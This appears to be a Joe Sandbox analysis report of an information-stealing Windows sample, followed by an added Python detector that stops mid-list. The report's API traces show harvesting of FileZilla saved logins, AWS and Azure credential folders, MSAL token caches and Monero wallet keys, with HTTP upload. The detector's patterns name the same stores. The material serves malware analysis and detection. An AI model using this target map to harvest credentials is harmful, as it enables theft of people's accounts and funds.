                              • Instruction Fuzzy Hash: 9F4114B350C724AFE3146E69EC857BAF7D4EF84720F1A8A3EDA8597680E574080086D6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a8f4d86a902d8e0ca895b336c70e24950d9def0b9ded82654e92738c108c80f5
                              • Instruction ID: 6f8ddf709a099bc61c212beeb59b0fa8d61af370d7dbb3da1dea6c6951a79436
                              • Opcode Fuzzy Hash: a8f4d86a902d8e0ca895b336c70e24950d9def0b9ded82654e92738c108c80f5
                              • Instruction Fuzzy Hash: F93127E391831C5BE7586E6CDC9932FB688AB14310F1E463D9ACA87B84FD695D0443C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                                • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                                • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                                • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                                • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                                • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                                • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,006A0DBA,006A0DB7,006A0DB6,006A0DB3), ref: 00690362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00690369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00690385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 006903CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 006903DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00690419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00690463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 00690532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00690562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00690571
                              • lstrcat.KERNEL32(?,url: ), ref: 00690580
                              • lstrcat.KERNEL32(?,00000000), ref: 00690593
                              • lstrcat.KERNEL32(?,006A1678), ref: 006905A2
                              • lstrcat.KERNEL32(?,00000000), ref: 006905B5
                              • lstrcat.KERNEL32(?,006A167C), ref: 006905C4
                              • lstrcat.KERNEL32(?,login: ), ref: 006905D3
                              • lstrcat.KERNEL32(?,00000000), ref: 006905E6
                              • lstrcat.KERNEL32(?,006A1688), ref: 006905F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00690604
                              • lstrcat.KERNEL32(?,00000000), ref: 00690617
                              • lstrcat.KERNEL32(?,006A1698), ref: 00690626
                              • lstrcat.KERNEL32(?,006A169C), ref: 00690635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,006A0DB2), ref: 0069068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 7537ce5b0826845fc8ddc56638ce3410b19098c3e793941ea2a53f1307cb8263
                              • Instruction ID: 64120f77521b2851068dfa968744d2e22df424645012cd3a58f638fbc3506204
                              • Opcode Fuzzy Hash: 7537ce5b0826845fc8ddc56638ce3410b19098c3e793941ea2a53f1307cb8263
                              • Instruction Fuzzy Hash: 6BD11B72910108ABDF48FBE4DD96EEE73BEFF15300F444518F502A6491DE74AA06CBA6
                              APIs
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                                • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                                • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006859F8
                              • StrCmpCA.SHLWAPI(?,0148E838), ref: 00685A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00685B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0148E778,00000000,?,0148A210,00000000,?,006A1A1C), ref: 00685E71
                              • lstrlen.KERNEL32(00000000), ref: 00685E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00685E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00685E9A
                              • lstrlen.KERNEL32(00000000), ref: 00685EAF
                              • lstrlen.KERNEL32(00000000), ref: 00685ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00685EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00685F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00685F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00685F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00685FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00685FBD
                              • HttpOpenRequestA.WININET(00000000,0148E7A8,?,0148DF30,00000000,00000000,00400100,00000000), ref: 00685BF8
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • InternetCloseHandle.WININET(00000000), ref: 00685FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              • Associated: 00000000.00000002.1765836063.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1765888735.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000A5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B37000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B5E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766068296.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766639416.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766850074.0000000000D09000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1766879303.0000000000D0A000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_680000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 6b55d403774e588a039e9b2a0c1232e351c85d74ce1491db9a2bed4e307aeadf
                              • Instruction ID: a7d8e95c7f25226581ef76edf47647f08ed6f000acd598773f3e9c6be14ebbf3
                              • Opcode Fuzzy Hash: 6b55d403774e588a039e9b2a0c1232e351c85d74ce1491db9a2bed4e307aeadf
                              • Instruction Fuzzy Hash: D412DE71820128AADF55EBE0DD95FEEB3BEBF14700F50419DB10A62491DF702A49CFA9
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,0148A5A0,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0068D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0068D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D208
                              • lstrcat.KERNEL32(?,006A1478), ref: 0068D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D22A
                              • lstrcat.KERNEL32(?,006A147C), ref: 0068D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D24C
                              • lstrcat.KERNEL32(?,006A1480), ref: 0068D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D26E
                              • lstrcat.KERNEL32(?,006A1484), ref: 0068D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D290
                              • lstrcat.KERNEL32(?,006A1488), ref: 0068D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D2B2
                              • lstrcat.KERNEL32(?,006A148C), ref: 0068D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0068D2D4
                              • lstrcat.KERNEL32(?,006A1490), ref: 0068D2E3
                                • Part of subcall function 0069A820: lstrlen.KERNEL32(00684F05,?,?,00684F05,006A0DDE), ref: 0069A82B
                                • Part of subcall function 0069A820: lstrcpy.KERNEL32(006A0DDE,00000000), ref: 0069A885
                              • lstrlen.KERNEL32(?), ref: 0068D32A
                              • lstrlen.KERNEL32(?), ref: 0068D339
                                • Part of subcall function 0069AA70: StrCmpCA.SHLWAPI(01488F38,0068A7A7,?,0068A7A7,01488F38), ref: 0069AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0068D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 978f44702931242d4c6ce66a1c3da1dd64fd7337b7f4cfd5a98d5ec27d78fb1b
                              • Instruction ID: 12574e7745b380c10225870d657197490b867f3b85c160beed4ea34fbfba2b52
                              • Opcode Fuzzy Hash: 978f44702931242d4c6ce66a1c3da1dd64fd7337b7f4cfd5a98d5ec27d78fb1b
                              • Instruction Fuzzy Hash: 8DE12B71910118ABCF48FBE0DD96EEE73BEBF14304F104159F506A6491DE35AE06CBAA
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                                • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                                • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                                • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                                • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,014891A8,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                                • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                                • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0148D518,00000000,?,006A144C,00000000,?,?), ref: 0068CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0068CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0068CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0068CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0068CAD9
                              • StrStrA.SHLWAPI(?,0148D428,006A0B52), ref: 0068CAF7
                              • StrStrA.SHLWAPI(00000000,0148D548), ref: 0068CB1E
                              • StrStrA.SHLWAPI(?,0148DC40,00000000,?,006A1458,00000000,?,00000000,00000000,?,014890D8,00000000,?,006A1454,00000000,?), ref: 0068CCA2
                              • StrStrA.SHLWAPI(00000000,0148DC80), ref: 0068CCB9
                                • Part of subcall function 0068C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C871
                                • Part of subcall function 0068C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C87C
                              • StrStrA.SHLWAPI(?,0148DC80,00000000,?,006A145C,00000000,?,00000000,01488FD8), ref: 0068CD5A
                              • StrStrA.SHLWAPI(00000000,014891E8), ref: 0068CD71
                                • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B46), ref: 0068C943
                                • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B47), ref: 0068C957
                                • Part of subcall function 0068C820: lstrcat.KERNEL32(?,006A0B4E), ref: 0068C978
                              • lstrlen.KERNEL32(00000000), ref: 0068CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0068CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: f55cfe7b5c3bf3d7eb6bdbad712b667ebfd574a1ca8a285bb02fae05a1e58f47
                              • Instruction ID: c99e1035301b9a48f9c303504991da4a1e1476a82cefe49162620682c6ed5989
                              • Opcode Fuzzy Hash: f55cfe7b5c3bf3d7eb6bdbad712b667ebfd574a1ca8a285bb02fae05a1e58f47
                              • Instruction Fuzzy Hash: ABE1EA71910108ABDF58EBE4DD95EEEB7BEBF14300F00415DF10666591EF306A4ACBAA
                              APIs
                                • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • RegOpenKeyExA.ADVAPI32(00000000,0148B688,00000000,00020019,00000000,006A05B6), ref: 006983A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00698426
                              • wsprintfA.USER32 ref: 00698459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0069847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0069848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00698499
                                • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 82fbc7d00bd7dc164c9c02791cf7797ef0c3f761ecbacee7249462cca7be2276
                              • Instruction ID: efcb057fe12393bff11fbfda853cf81b0561d7ec0854b53f26817e1981f2d8a9
                              • Opcode Fuzzy Hash: 82fbc7d00bd7dc164c9c02791cf7797ef0c3f761ecbacee7249462cca7be2276
                              • Instruction Fuzzy Hash: 6F81197191011CABEB68DB90CD95FEAB7BDBF08704F008298E109A6580DF716A85CFE5
                              APIs
                                • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00694DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00694DCD
                                • Part of subcall function 00694910: wsprintfA.USER32 ref: 0069492C
                                • Part of subcall function 00694910: FindFirstFileA.KERNEL32(?,?), ref: 00694943
                              • lstrcat.KERNEL32(?,00000000), ref: 00694E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00694E59
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                                • Part of subcall function 00694910: FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                                • Part of subcall function 00694910: FindClose.KERNEL32(000000FF), ref: 00694B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00694EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00694EE5
                                • Part of subcall function 00694910: wsprintfA.USER32 ref: 006949B0
                                • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A08D2), ref: 006949C5
                                • Part of subcall function 00694910: wsprintfA.USER32 ref: 006949E2
                                • Part of subcall function 00694910: PathMatchSpecA.SHLWAPI(?,?), ref: 00694A1E
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,0148E848), ref: 00694A4A
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,006A0FF8), ref: 00694A5C
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,?), ref: 00694A70
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,006A0FFC), ref: 00694A82
                                • Part of subcall function 00694910: lstrcat.KERNEL32(?,?), ref: 00694A96
                                • Part of subcall function 00694910: CopyFileA.KERNEL32(?,?,00000001), ref: 00694AAC
                                • Part of subcall function 00694910: DeleteFileA.KERNEL32(?), ref: 00694B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1765888735.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: bb1abda554bb3f8d55e61348c9bae2b12601787974ef8617ab3b5a5f3a2a99a7
                              • Instruction ID: 94bf933d4352a251013be64099ce894169a574c2b749c7475c12795c5853ca1c
                              • Opcode Fuzzy Hash: bb1abda554bb3f8d55e61348c9bae2b12601787974ef8617ab3b5a5f3a2a99a7
                              • Instruction Fuzzy Hash: 5B41A3BA94021867DB54F770EC47FED733EAB26704F004498B645A60C2EEB45BC98B92
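The function traced above resolves a folder with SHGetFolderPathA (CSIDL 0x1C, which is CSIDL_LOCAL_APPDATA), appends \.azure\, \.aws\ and \.IdentityService\, walks each directory with FindFirstFileA/FindNextFileA and PathMatchSpecA, and stages matching files with CopyFileA followed by DeleteFileA; an earlier function in this report does the same for \Monero\wallet.keys. The following detector is an added example written for this page, not code from the report or from the sample: it replays file-access events and flags a process that touches two or more of those credential stores and copies them out. The event format, the process names, the paths in EVENTS and the two-store threshold are constructed assumptions for the example.

```python
"""
Added example (not part of the Joe Sandbox report or the analysed sample):
flag a process that touches several of the credential stores the report
shows the sample enumerating, then copies them out.
"""
import re
from collections import defaultdict

# Path fragments taken from the report's string table and subcall arguments
# for these functions; matched case-insensitively because Windows paths are.
HARVEST_PATTERNS = [
    re.compile(r"\\\.aws\\", re.I),                 # index 0: \.aws\
    re.compile(r"\\\.azure\\", re.I),               # index 1: \.azure\
    re.compile(r"\\\.IdentityService\\", re.I),     # index 2: \.IdentityService\ (msal.cache)
    re.compile(r"\\Monero\\wallet\.keys$", re.I),   # index 3: \Monero\wallet.keys
]

# Threshold (assumption): one store is normal for the aws/az CLI tools;
# two or more unrelated stores from one process is the stealer pattern.
MIN_DISTINCT_STORES = 2


def matched_store(path):
    """Return the index of the first credential-store pattern matching path, or None."""
    for i, pat in enumerate(HARVEST_PATTERNS):
        if pat.search(path):
            return i
    return None


def find_harvesters(events, min_stores=MIN_DISTINCT_STORES):
    """
    events: iterable of dicts with keys pid, image, op, path
            (op is 'read', 'copy' or 'delete'; format is an assumption).
    Returns {pid: {"image": ..., "stores": set(indices), "copied": [paths]}}
    for every pid that touched at least min_stores distinct stores.
    """
    per_pid = defaultdict(lambda: {"image": None, "stores": set(), "copied": []})
    for ev in events:
        idx = matched_store(ev["path"])
        if idx is None:
            continue                      # not a credential store, ignore
        rec = per_pid[ev["pid"]]
        rec["image"] = ev["image"]
        rec["stores"].add(idx)
        if ev["op"] == "copy":
            rec["copied"].append(ev["path"])
    return {pid: rec for pid, rec in per_pid.items()
            if len(rec["stores"]) >= min_stores}


# Constructed sample events (not from the report): pid 4242 mimics the traced
# behaviour (enumerate the stores, copy the hits, delete the staging copy);
# pid 1001 is a legitimate aws CLI reading its own credentials file once.
EVENTS = [
    {"pid": 1001, "image": "aws.exe", "op": "read",
     "path": r"C:\Users\u\.aws\credentials"},
    {"pid": 4242, "image": "file.exe", "op": "read",
     "path": r"C:\Users\u\AppData\Local\.azure\accessTokens.json"},
    {"pid": 4242, "image": "file.exe", "op": "copy",
     "path": r"C:\Users\u\AppData\Local\.azure\accessTokens.json"},
    {"pid": 4242, "image": "file.exe", "op": "read",
     "path": r"C:\Users\u\.aws\credentials"},
    {"pid": 4242, "image": "file.exe", "op": "copy",
     "path": r"C:\Users\u\.aws\credentials"},
    {"pid": 4242, "image": "file.exe", "op": "read",
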